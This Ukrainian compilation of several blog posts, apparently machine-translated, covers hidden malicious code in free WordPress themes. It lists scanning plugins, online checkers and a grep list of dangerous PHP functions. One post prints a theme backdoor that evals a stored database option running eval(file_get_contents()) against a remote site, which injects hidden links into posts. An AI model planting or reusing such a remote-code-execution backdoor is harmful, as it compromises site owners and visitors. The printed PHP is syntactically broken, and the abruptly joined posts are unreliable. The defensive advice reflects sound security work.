Привіт друзі. Ви впевнені, що безкоштовний шаблон WordPress, який ви використовуєте для своїх сайтів та блогів дійсно безпечний і не містить прихованих загроз та шкідливого коду? Ви цілком у цьому впевнені? Абсолютно?)
Думаєте, прогнали шаблон через , видалили з нього приховані посилання, і справа зроблена. Файли сайту періодично скануєте антивірусом, заглядаєте в інструменти вебмайстра Яндекса у вкладку Безпека і з полегшенням бачите там повідомлення: « Шкідливий код на сайті не виявлено«.
От і я так думав. Не хотів би вас засмучувати, але…
Прихований небезпечний код у безкоштовних шаблонах WordPress
Ось такого листа я одержав минулого тижня на пошту від свого хостингу. З недавніх пір вони запровадили регулярну перевірку всіх файлів сайту на пошук шкідливого змісту і таки вони цей зміст у мене виявили!
Почалося все з того, що я зайшов якось удень на свій сайт і не зміг його запустити - вилазив лайливий напис про не знайдені файли з розширенням php. Трохи напружившись пішов вивчати вміст папки з сайтом на хостингу і відразу ж виявив проблему - мій файл шаблону fuctions.php був перейменований в functions.php.malware що як би неоднозначно натякало - тут попрацював антивірус або щось подібне до цього. та виявив вищезгаданий звіт від хостера.
Насамперед я звичайно ж почав перевіряти даний файл, вивчав його вміст, сканував всілякими антивірусами, десятками онлайн сервісівщодо перевірки на віруси і т.д. - В результаті нічого не виявив, всі в один голос стверджували, що файл абсолютно безпечний. Я зрозуміло висловив свої сумніви хостеру, мовляв, ви чогось наплутали, але про всяк випадок попросив їх надати звіт про виявлення шкідливого шматка коду.
І ось що вони мені відповіли
Пішов гуглити інфу про цей код і серйозно замислився.
Як знайти фрагмент шкідливого коду у шаблоні
Як виявилося, це справді нетривіальний прийом, який дозволяє зацікавленим особам передавати дані на ваш сайт та змінювати вміст сторінок без вашого відома! Якщо ви використовуєте безкоштовний шаблон, то рекомендую перевірити свій functions.php на наявність наступного коду:
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content)(
global $post;
if(is_single() && ( [email protected](get_option('blogoption'))) !== false)(
return $co;
) else return $content;
}
Навіть з моїми дуже неглибокими знаннями в php видно, що створюється якийсь фільтр, що прив'язується до глобальної змінної post і content, що відповідають за виведення контенту тільки на сторінках записів блогу (умова is_single). Вже підозріло чи не так? Ну а тепер подивимося що такого збирається виводити даний код у нас на сайті.
Цікава опція blogoption, що запитується в базі даних, так само виглядає дуже підозрілою. Заходимо до нашої бази даних MySQLі знаходимо там таблицю під назвою wp_options, якщо ви не змінювали префікси, то вона так виглядатиме за замовчуванням. І в ній знаходимо рядок, що зацікавив нас, під назвою blogoption
Яка краса! Ми бачимо наступну опцію
return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
Тобто. нам з деякого сайту (причому російського зауважте) повертають вміст, який може нести в собі все, що завгодно! Будь-яка кількість посилань, шкідливі коди, змінений текст тощо. Сам сайт при заході на нього видає 403 помилки доступу, що не дивно. Зрозуміло цю опцію я теж вилучив із БД.
За інформацією від постраждалих зазвичай повертається такий вміст вашої статті з однією лише модифікацією — замість будь-якої точки «.» у текст маскувалася відкрита посилання! І до речі, дана опція записується в базу даних при установці самого шаблону, а потім код, який це робить самознищується. І ось з такою поганью я жив два роки, і жоден антивірус чи сервіс мені так і не виявив цю загрозуза весь час. Чесно кажучи я не помічав, чи спрацьовував коли-небудь зі мною такий прийом, або ж цю можливість блокував мій плагін безпеки (а може, одне з оновлень WordPressa закрило цю дірку), але все одно неприємно.
Мораль про безкоштовний сир
Як вам витонченість наших «перекладачів» шаблонів (або тих, хто викладає їх у себе в каталогах)? Це вам не посилання з футера випилювати) Шкода я вже не пам'ятаю, звідки я завантажував свій шаблон, давно це було, а то б обов'язково пару ласкавих написав. І якби на той момент мав той самий досвід, що маю зараз, то однозначно не користувався б безкоштовним шаблоном, або на крайній випадок не качав би з невідомих джерел!
Простіше купити який-небудь офіційний преміум шаблон за 15-20 баксів на тому ж і жити спокійно, знаючи що в ньому немає дірок і зашифрованих посилань, а якщо навіть знайдуться вразливості, то розробники обов'язково випустять оновлення, в якому ці дірки закриють. ( У Артема до речі нещодавно вийшла стаття, де він якраз про преміум шаблони розповідає і навіть роздає промокоди на звірячі знижки, кому цікаво)
WordPress - це найпопулярніший движок для створення різноманітних інформаційних сайтів та блогів. Безпека вашого сайту – це більше, ніж безпека ваших даних. Це набагато важливіше, тому що це безпека всіх користувачів, які читають ваш ресурс і довіряють йому. Ось чому так важливо, щоб сайт не був заражений вірусами або будь-яким іншим шкідливим кодом.
Як захистити WordPress від злому ми розглянемо в одній з наступних статей, а зараз я хочу розповісти, як перевірити сайт WordPress на віруси і шкідливий код, щоб переконатися, що все в безпеці.
Найперший варіант, який спадає на думку - вас зламали хакери і вбудували в код вашого сайту свої бекдори, щоб мати можливість розсилати спам, ставити посилання та інші погані речі. Так іноді трапляється, але це досить рідкісний випадок, якщо ви вчасно оновлюєте програмне забезпечення.
Існують тисячі безкоштовних тем для WordPress та різних плагінів і вже тут може бути загроза. Одна справа, коли ви завантажуєте шаблон із сайту WordPress і зовсім інша, коли знаходите на лівому сайті. Несумлінні розробники можуть вбудовувати різний шкідливий код у свої продукти. Ще більший ризик, якщо ви завантажуєте безкоштовні преміум шаблони, там зломщики вже нічим не ризикуючи можуть додати якусь дірку в безпеці, через яку потім зможуть проникнути і зробити те, що їм потрібно. Ось тому така важлива перевірка wordpress сайту на віруси.
Перевірка wordpress сайту на віруси
Перше, до чого потрібно звернутися при перевірці сайту не віруси, це плагіни WordPress. Швидко і просто ви можете сканувати свій сайт і знайти підозрілі ділянки коду, на які варто звернути увагу, будь вони в темі, плагіні та самому ядрі Wodpress. Розглянемо кілька найпопулярніших плагінів:
1. TOC
Цей дуже простий плагін перевіряє всі встановлені на вашому сайті теми щодо наявності в них шкідливого коду. Плагін виявляє приховані посилання, зашифровані за допомогою base64 вставки коду, а також виводить детальну інформаціюпро знайдені проблеми. Найчастіше, знайдені частини коду – це не віруси, але вони потенційно можуть бути небезпечними, тому вам варто звернути на них увагу.
Відкрийте "Зовнішній вигляд" -> "TAC"потім дочекайтеся доки всі теми будуть перевірені.
2. VIP Scanner
Дуже схожий на TOC сканер, але виводить більше докладної інформації. Ті самі можливості з виявлення посилань, прихованого коду та інших шкідливих вставок. Просто відкрийте пункт VIP Scaner у розділі інструменти та аналізуйте результат.
Можливо, достатньо видалити зайві файли, наприклад desktop.ini. Або ж потрібно докладніше подивитися що відбувається у файлах, що використовують base64.
3. Anti-Malware від GOTMLS.NET
Цей плагін дозволяє не тільки сканувати теми та ядро сайту на наявність вірусів, але й захищати сайт від перебору паролів та різних XSS, SQLInj атак. Пошук виконується на основі відомих сигнатур та вразливостей. Деякі вразливості можна дома усувати. Щоб почати сканувати файли, відкрийте "Anti-Malvare"у бічному меню та натисніть "Run Scan":
Перед тим, як ви зможете запустити сканування, потрібно оновити бази даних сигнатур.
4. Wordfence
Це один із найпопулярніших плагінів для захисту WordPress та сканування на наявність шкідливого коду. Крім сканера, який може знайти більшість закладок у коді WordPress, тут є постійний захист від різних видіватак та перебору паролів. Під час пошуку плагін знаходить можливі проблемиз різними плагінами та темами, повідомляє про необхідність виконати оновлення WordPress.
Відкрийте вкладку "WPDefence"у бічному меню, а потім перейдіть на вкладку "Scan"і натисніть "Start Scan":
Сканування може зайняти певний час, але після завершення ви побачите докладний звіт про виявлені проблеми.
5. AntiVirus
Це ще один простий плагін, який просканує ваш шаблон сайту на наявність шкідливого коду. Недолік в тому, що сканується лише поточний шаблон, але інформація відображається досить детально. Ви побачите всі небезпечні функції, які є в темі і потім можете детально проаналізувати, чи вони представляють якусь небезпеку. Знайдіть пункт "AntiVirus"в налаштуваннях, а потім натисніть "Scan theme templates now":
6. Integrity Checker
Також бажано перевірити цілісність файлів WordPress на випадок, якщо вірус вже записався вже кудись. Для цього можна використовувати плагін Integrity Checker. Він перевіряє всі файли ядра, плагінів та шаблонів на зміни. Наприкінці сканування ви побачите інформацію про змінені файли.
Онлайн сервіси
Існує також кілька онлайн-сервісів, які дозволяють перевірити сайт Wordpress на віруси або перевірити лише шаблон. Ось деякі з них:
themecheck.org- ви завантажуєте архів теми та можете дивитися всі попередження про можливі шкідливі функції, які в ній використовуються. Ви можете не тільки дивитися інформацію про свою тему, але й інші теми, завантажені іншими користувачами, а також про різних версіяхтеми. Все, що знаходять плагіни, може знайти і цей сайт. Перевірка wordpress темитеж дуже важлива.
virustotal.com- всім відомий ресурс, де ви можете перевірити свій сайт або файл шаблон на віруси.
ReScan.pro- перевірка WordPress сайту на віруси за допомогою цього сервісу безкоштовна, виконується статичний та динамічний аналіз, щоб виявити можливі редиректи сканер відкриває сторінки сайту. Перевіряє сайт за різними чорними списками.
sitecheck.sucuri.net- простий сервіс для сканування сайту та тем на віруси. Є свій плагін для WordPress. Виявляє небезпечні посилання та скрипти.
Ручна перевірка
Нічого не може бути краще, ніж ручна перевірка. У Linux є така чудова утиліта grep, яка дозволяє шукати входження довільних рядків у папці з файлами. Залишилося зрозуміти що ми шукатимемо:
eval - ця функція дозволяє виконувати довільний php код, її не використовують продукти, що поважають себе, якщо один з плагінів або тема використовують цю функцію майже зі стовідсотковою ймовірністю можна сказати, що там є вірус;
- base64_decode- функції шифрування можуть використовуватися разом з eval, щоб сховати шкідливий код, але вони можуть застосовуватися і в мирних цілях, тому будьте уважні;
- sha1- ще один метод шифрування шкідливого коду;
- gzinflate- функція стиснення, ті самі цілі, разом з eval, наприклад, gzinflate(base64_decode(код);
- strrev- перевертає рядок задом не перед тим, як варіант може використовуватися для примітивного шифрування;
- print- виводить інформацію в браузер, разом із gzinflate або base64_decode небезпечно;
- file_put_contents- сам WordPress або плагіни ще можуть створювати файли у файловій системі, але якщо це робить тема, то вже варто насторожитися і перевірити, навіщо їй це, так можуть встановлюватися віруси;
- file_get_contents- у більшості випадків використовується в мирних цілях, але може використовуватись для завантаження шкідливого коду або читання інформації з файлів;
- curl- та сама історія;
- fopen- відкриває файл для запису, чи мало чого;
- system- функція виконує команду в системі Linux, якщо це робить тема, плагін або сам wordpress, швидше за все там вірус;
- symlink- створює символічні посилання в системі, можливо, вірус намагається зробити основну файлову системудоступної з-за;
- copy- Копіює файл з одного місця в інше;
- getcwd- Повертає ім'я поточного робочого каталогу;
- cwd- Змінює поточну робочу папку;
- ini_get- отримує інформацію про налаштування PHP, частіше в мирних цілях, але мало;
- error_reporting(0)- відключає виведення будь-яких повідомлень про помилки;
- window.top.location.href- javascript функція, що використовується для редиректів на інші сторінки;
- hacked- так, про всяк випадок, перевіряємо, раптом хакер сам нам вирішив розповісти.
Ви можете підставляти кожне окреме слово у таку команду:
grep -R "hacked" /var/www/шлях/до/файлам/wordpress/wp-content/
Або ж використовувати простий скрипт, який шукатиме всі слова за раз:
values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr (ord (
cwd
ini_get
window.top.location.href
copy(
eval(
system(
symlink(
error_reporting(0)
print
file_get_contents(
file_put_contents(
fopen(
hacked"
cd /var/www/шлях/до/файлам/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *
Привіт, друзі IdeaFox!
Не знаю, як ви, а я погано ночами сплю. Мучить мене питання безпеки блогу. Сил уже немає жодних: –)
Перечитав купу блогів на цю тему та протестував багато плагінів, які допомагають вирішити цю проблему. Та й у коментарях стали ставити питання щодо теми захисту сайту, що й підштовхнуло мене написати цю замітку.
Ось уявіть собі, що Ви ведете блог, пишіть статті, намагаєтеся… І приходять злі мудаки, які ламають ваш сайт. Думаю, що прикрощів буде дуже і дуже багато.
Адже кожен нормальний блогер вкладає дуже багато часу та сил у розвиток свого сайту. А для багатьох блогінг взагалі стає нав'язливою ідеєю ... Тут і до , якщо ТАКЕ станеться:
Ну ви зрозуміли, наскільки це важливо.
Перейдемо до справи, нарешті:)
Кілька місяців тому я вже писав замітку про те, від злому. Обов'язково прочитайте її. Але з того часу пройшло досить багато часу і я вжив додаткових заходів щодо посилення кругової оборони.
У наступних нотатках я обов'язково докладно зупинюся на цьому питанні. (Про налаштування ISP теж пам'ятаю та пишу)
3. Перевіряємо сайт на інших онлайн-сервісах
Таких сервісів розлучилося мабуть-невидимо. У мене склалася стійка думка, що багато з них абсолютно безглузді і створені виключно для показу реклами.
Лікар Веб
Компанія DR.Web зробила гарний сервісдля перевірки веб-сайтів он-лайн. Особисто мені він допоміг один раз знайти заразу у друга на блозі (Був сторонній код у файлі.htaccess)
Перевірка дуже проста. Вносимо свій URL і чекаємо на результат перевірки.
antivirus-alarm.ru
Потужний сканер сайтів, який використовує аж 43 антивірусні базивід провідних антивірусних компаній світу
Тут також усе дуже просто. Вбиваємо URL свого сайту і із завмиранням серця чекаємо на результати сканування.
Ось я дочекався таких.
Все чисто, можна спати спокійно: –)
Все це, звичайно, добре, але потрібно ще й встановити пару плагінів, які зовсім не завадять для WordPress-блогів.
4. Попросіть хостера перевірити ваш сайт
Справа в тому, що хостери ще більше вас стурбовані питаннями безпеки і мають у своєму розпорядженні потужні засоби захисту. Причому спеціалізованими засобами захисту.
Ось такі новини для Вас сьогодні. Далі я розповім про дуже потужний плагін, який дозволяє істотно захистити ваш ВордПрес блог від злому.
Я вже працюю з ним 2 місяці і дуже задоволений. Поки розібрався з ним 3 рази, сам себе забанив: –) Коротше, є що розповісти.
Один з найважливіших етапівпід час створення блогу – вибір якісного шаблона. Існує багато сайтів як платно, так і безкоштовно. Однак тут треба бути обережними, так як велика ймовірність разом з файлом отримати віруси, шкідливі скрипти і приховані посилання.
Але навіть якщо шаблон чистий у плані безпеки, а його дизайн, юзабіліті та функціонал вас повністю влаштовують – це не означає, що все гаразд. Тема повинна мати валідний HTML та CSS код, а також відповідати всім стандартам CMS WordPress. З останнім є проблеми навіть у платних тем та шаблонів, зроблених на замовлення.
Розробники двигуна постійно розвивають його, а автори шаблонів не завжди встигають за ними, використовуючи застарілі функції при їх створенні.
Сьогодні я покажу два способи перевірки тем WordPress на відповідність стандартам. Ці інструменти використовуються при їх додаванні до офіційного каталогу https://wordpress.org/themes/
Сервіс перевірки тем WordPress та шаблонів Joomla на відповідність стандартам
ThemeCheck.org – це безкоштовний сервіс, який дозволяє перевірити безпеку та якість шаблонів для CMS WordPress та Joomla перед встановленням на сайт.
Для перевірки теми завантажте її архів з вашого комп'ютера, натиснувши кнопку “Select file ” на сайті themecheck.org . Якщо не бажаєте, щоб результати перевірки зберігалися на сервісі та були доступні іншим користувачам, встановіть галочку “ Forget uploaded data after results“. Тепер натисніть кнопку “Submit”.
Наприклад, я взяв тему Interface, яку скачав на офіційному сайті 99 із 100 – 0 критичних помилокта 1 попередження. Це дуже добрий результат.
Для порівняння, шаблон мого блогу отримав оцінку 0 (14 помилок та 23 попередження). Думаю, що у багатьох результати не надто відрізнятимуться, особливо якщо теми вже застаріли. Усі зауваження з поясненнями, вказівкою файлів та рядків, де вони виявлені, розташовані на цій же сторінці нижче.
Зізнатись, я там мало що зрозумів, це швидше буде корисно для авторів, а мені простіше змінити шаблон, аніж усе виправляти. Не знаю тільки, коли я наважусь на це.
На Головній є великий вибір раніше перевірених веб-тем WordPress та Joomla з можливістю сортування за часом додавання або оцінки. При натисканні на них можна побачити докладну інформацію та посилання на сайт автора та сторінку для скачування.
Якщо ви розробник та ваша тема валідна на 100%, можете повідомити про це користувачів, встановивши на ній спеціальний значок із оцінкою.
Цінність сервісу ThemeCheck.org у тому, що будь-який вебмайстер може за його допомогою вибрати якісну тему ще до її встановлення на блог.
Плагін Theme Check
Перевірити вже встановлений шаблон на сумісність з останніми стандартами Вордпрес можна за допомогою плагіна Theme Check . Посилання на скачування останньої версії: https://wordpress.org/plugins/theme-check/
Функціонал плагіна аналогічний до сервісу, про який я розповів вище. Жодних налаштувань після стандартної установки та активації робити не треба. Порядок перевірки:
- Перейдіть в адмінці на сторінку меню "Зовнішній вигляд" - "Theme Check".
- Виберіть зі списку потрібну тему, якщо їх встановлено кілька.
- Встановіть галочку "Suppress INFO", якщо не бажаєте надсилати інформацію.
- Натисніть кнопку "Check it".
Результати будуть показані на цій сторінці.
Як бачите, стандартна тема Twenty Tenтеж не ідеальна, а ось, наприклад, Twenty Fourteenпомилок немає.
Після перевірки плагін можна відключити, а краще видалити до наступного разу.
Висновок.Перед встановленням нового шаблону WordPress перевіряйте його не лише на наявність прихованих посиланьта шкідливого коду плагіном TAC, але й за допомогою сервісу ThemeCheck.org або плагіна Theme Check на відповідність останнім стандартам CMS.
P.S.Нещодавно переглядаючи TopSape Reader, побачив новий SEO-блог zenpr.ru, який тримає 1 місце серед блогерів переходів за місяць. Якщо врахувати, що його вік трохи більше за місяць, то результат гідний поваги. Дизайн у стилі мінімалізму, якщо не сказати, що його взагалі немає, але пише автор – зачитаєшся. Все у справі та без води. Як у заголовку блогу – «нуль зайвих символів». Рекомендую почитати, знайдете багато корисної інформації.
На просторах Інтернету є багато безкоштовних шаблонів сайтів. Про те, що безкоштовний сирбуває тільки в мишоловці, знають все і все одно рука тягнеться завантажити таку безкоштовність і встановити на свій сайт.
Перш ніж ставити безкоштовний шаблон, не завадило б перевірити його на приховані посилання.
Ставлячи безкоштовний шаблон, багато хто і не припускає, що розкрутити і заробити на такому сайті просто не зможуть.
В одному такому шаблоні може бути кілька посилань. Добре ще, якщо вкладені посилання будуть на подібний до вашої тематики сайт, а не на сайти для дорослих. І їх буде лише дві чи три, а не десятки.
Чим встановлення такого безкоштовного шаблону загрожує вашому сайту? Сайт потрапить під фільтри, вийти з-під яких практично неможливо. Сайт під фільтрами – мертвий сайт!
Установка безкоштовного шаблону на свій сайт нагадує руську рулетку. Тільки шанс встановити абсолютно чистий шаблон, дорівнює нулю.
У кращому випадку ви отримаєте 3-5 лівих посилань на своєму сайті. Можна, звичайно, спробувати почистити такий шаблон, але є умільці, які вписують посилання шаблон так, що прибрати їх звідти не можна (порушується шаблон, його просто перекошує).
Якщо чесно, то простіше замовити новий чистий і унікальний (чого не скажеш про безкоштовне) шаблон, дешевше обійдеться.
За створення шаблону я, наприклад, беру 200 руб (пишіть у скайп: oxamitta). От скажіть, воно того варте? Взяти безкоштовність і втратити сайт, зате зекономити 200 руб? Нічого собі економія!
Але що ж робити, якщо ви вже поставили на безкоштовний шаблон? Як перевірити шаблон на приховані посилання?
Для цього існує спеціальний плагін. Прибрати ці посилання він не допоможе, а ось виявити будь ласка.
Можливо, не все так страшно і у вашому шаблоні всієї пари зовнішніх посилань! Бажаєте перевірити шаблон? Тоді завантажуйте плагін за посиланням нижче (щоб з'явилося посилання на завантаження плагіна, клацніть одну з кнопок соц. мереж).
Плагін встановлюється в адмінці сайту стандартним чином. Знімати про це відео нема рації, тому сьогодні ми обійдемося парою скріншетів.
Встановлюєте плагін та активуєте.
Щоб збільшити скріншет, клацніть по ньому лівою кнопкою мишки. 
Заходьте у вкладку Зовнішній вигляд, ТАС.
Завантаження...